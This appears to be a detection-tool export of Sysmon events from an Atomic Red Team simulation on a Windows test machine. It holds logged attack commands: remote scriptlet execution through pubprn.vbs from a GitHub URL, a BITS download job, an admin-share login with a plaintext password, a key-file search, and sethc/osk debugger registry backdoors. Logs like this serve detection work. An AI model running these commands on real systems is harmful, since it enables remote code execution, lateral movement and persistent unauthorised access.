Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3678 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.532 + 747F3D96-D859-5D31-0000-001045922F00 + 6220 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D859-5D31-0000-0010FB8F2F00 + 888 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3677 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.502 + 747F3D96-D859-5D31-0000-0010FB8F2F00 + 888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3676 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.433 + 747F3D96-D859-5D31-0000-0010E68C2F00 + 6524 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3675 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:46.221 + 747F3D96-D84E-5D31-0000-00102C702F00 + 1628 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.103 + 747F3D96-D849-5D31-0000-00103C522F00 + 6068 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.103 + 747F3D96-D849-5D31-0000-00103C522F00 + 6068 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3673 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.068 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D849-5D31-0000-0010914D2F00 + 2096 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3672 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.034 + 747F3D96-D849-5D31-0000-0010914D2F00 + 2096 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3670 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:37.099 + 747F3D96-D845-5D31-0000-001098212F00 + 2624 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3669 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:36.869 + 747F3D96-D844-5D31-0000-0010C70A2F00 + 2484 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-D844-5D31-0000-001075082F00 + 7140 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3668 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:36.811 + 747F3D96-D844-5D31-0000-001075082F00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3667 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:31.222 + 747F3D96-D83F-5D31-0000-00105EF22E00 + 4888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3665 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:31.115 + 747F3D96-D83F-5D31-0000-001001EC2E00 + 3760 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3663 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.995 + 747F3D96-D83E-5D31-0000-001046E52E00 + 4332 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3661 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.882 + 747F3D96-D83E-5D31-0000-001088DE2E00 + 7072 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3659 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.775 + 747F3D96-D83E-5D31-0000-0010A2D72E00 + 4036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3733 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:07.254 + 747F3D96-D89F-5D31-0000-00106C7D3200 + 864 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3732 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:02.238 + 747F3D96-D89A-5D31-0000-0010F2703200 + 1132 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3729 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:02.144 + 747F3D96-D89A-5D31-0000-0010A46B3200 + 1228 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3728 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.263 + 747F3D96-D890-5D31-0000-001085443200 + 4316 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 